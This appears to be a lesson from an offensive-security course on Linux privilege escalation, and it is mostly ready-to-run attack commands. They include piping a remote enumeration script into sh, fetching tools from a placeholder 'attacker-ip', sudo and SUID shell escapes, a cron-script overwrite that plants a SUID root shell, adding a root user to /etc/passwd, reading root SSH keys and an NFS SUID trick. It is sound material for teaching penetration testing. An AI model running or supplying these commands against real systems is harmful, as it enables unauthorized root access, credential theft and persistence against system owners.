Post-Exploitation & Privilege Escalation
Linux Privilege Escalation
5 min read
After gaining initial access, escalating to root is essential for full system control. This lesson covers the most common Linux privilege escalation techniques.
Enumeration Scripts
LinPEAS (Recommended)
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or transfer and run
wget http://attacker-ip/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinEnum
wget http://attacker-ip/linenum.sh
chmod +x linenum.sh
./linenum.sh -t
Linux Exploit Suggester
wget http://attacker-ip/les.sh
chmod +x les.sh
./les.sh
Manual Enumeration
System Information
# OS and kernel
uname -a
cat /etc/issue
cat /etc/*-release
cat /proc/version
# Current user
id
whoami
# All users
cat /etc/passwd
cat /etc/group
# Sudo privileges
sudo -l
SUID/SGID Binaries
# Find SUID binaries
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries
find / -perm -g=s -type f 2>/dev/null
# Both
find / -perm -4000 -o -perm -2000 -type f 2>/dev/null
Writable Files
# World-writable files
find / -writable -type f 2>/dev/null
# Writable directories
find / -writable -type d 2>/dev/null
# Writable /etc files
find /etc -writable -type f 2>/dev/null
Privilege Escalation Techniques
1. Sudo Misconfiguration
Check sudo rights:
sudo -l
Common exploitable entries:
# If you can run vim as root
sudo vim -c ':!/bin/bash'
# If you can run less as root
sudo less /etc/passwd
!/bin/bash
# If you can run find as root
sudo find . -exec /bin/bash \; -quit
# If you can run python as root
sudo python -c 'import os; os.system("/bin/bash")'
# If you can run nmap as root (old versions)
sudo nmap --interactive
!sh
Check GTFOBins for more: gtfobins.github.io
2. SUID Exploitation
Identify vulnerable SUID binaries:
find / -perm -u=s -type f 2>/dev/null
Common exploitable SUID binaries:
# /usr/bin/find
find . -exec /bin/sh -p \; -quit
# /usr/bin/vim
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
# /usr/bin/bash
bash -p
# /usr/bin/python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# /usr/bin/nmap (interactive mode)
nmap --interactive
!sh
3. Capabilities
# Find files with capabilities
getcap -r / 2>/dev/null
Exploit cap_setuid:
# If python has cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
4. Cron Jobs
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
cat /var/spool/cron/crontabs/*
# Check for writable scripts
ls -la /path/to/cron/script
# Check PATH in crontab
# If PATH includes writable directory, create malicious script
Exploit writable cron script:
# If /opt/script.sh is writable and runs as root
echo '#!/bin/bash' > /opt/script.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /opt/script.sh
# Wait for cron, then:
/tmp/rootbash -p
5. Kernel Exploits
# Check kernel version
uname -r
# Search for exploits
searchsploit "Linux Kernel $(uname -r)"
Notable kernel exploits:
| Exploit | Affected Versions |
|---|---|
| DirtyCow (CVE-2016-5195) | Linux < 4.8.3 |
| DirtyPipe (CVE-2022-0847) | Linux 5.8 - 5.16.11 |
| PwnKit (CVE-2021-4034) | Most Linux systems |
6. Writable /etc/passwd
# If /etc/passwd is writable, add a root user
openssl passwd -1 password123
# Output: $1$xyz$hashedpassword
# Add to /etc/passwd
echo 'root2:$1$xyz$hashedpassword:0:0:root:/root:/bin/bash' >> /etc/passwd
# Switch to new root user
su root2
# Password: password123
7. SSH Keys
# Check for readable SSH keys
cat /home/*/.ssh/id_rsa
cat /root/.ssh/id_rsa
# Check for writable authorized_keys
ls -la /root/.ssh/
# If writable, add your public key
8. NFS Misconfiguration
# Check /etc/exports
cat /etc/exports
# Look for: no_root_squash
# On attacker machine:
showmount -e target-ip
mount -t nfs target-ip:/share /mnt
# Create SUID shell
cp /bin/bash /mnt/rootbash
chmod +s /mnt/rootbash
# On target:
/share/rootbash -p
PrivEsc Methodology
1. Run enumeration script (LinPEAS)
2. Check sudo -l
3. Find SUID/SGID binaries
4. Check cron jobs
5. Look for credentials in files
6. Check kernel version for exploits
7. Examine capabilities
8. Check writable files/directories
9. Look for NFS misconfigurations
10. Check for Docker/LXC breakout
Quick Reference
# Basic enumeration
id; whoami; hostname
uname -a
cat /etc/passwd
# Sudo
sudo -l
# SUID
find / -perm -u=s -type f 2>/dev/null
# Cron
cat /etc/crontab
ls -la /etc/cron.*
# Capabilities
getcap -r / 2>/dev/null
# Writable
find / -writable -type f 2>/dev/null
Next, we'll cover Windows privilege escalation techniques. :::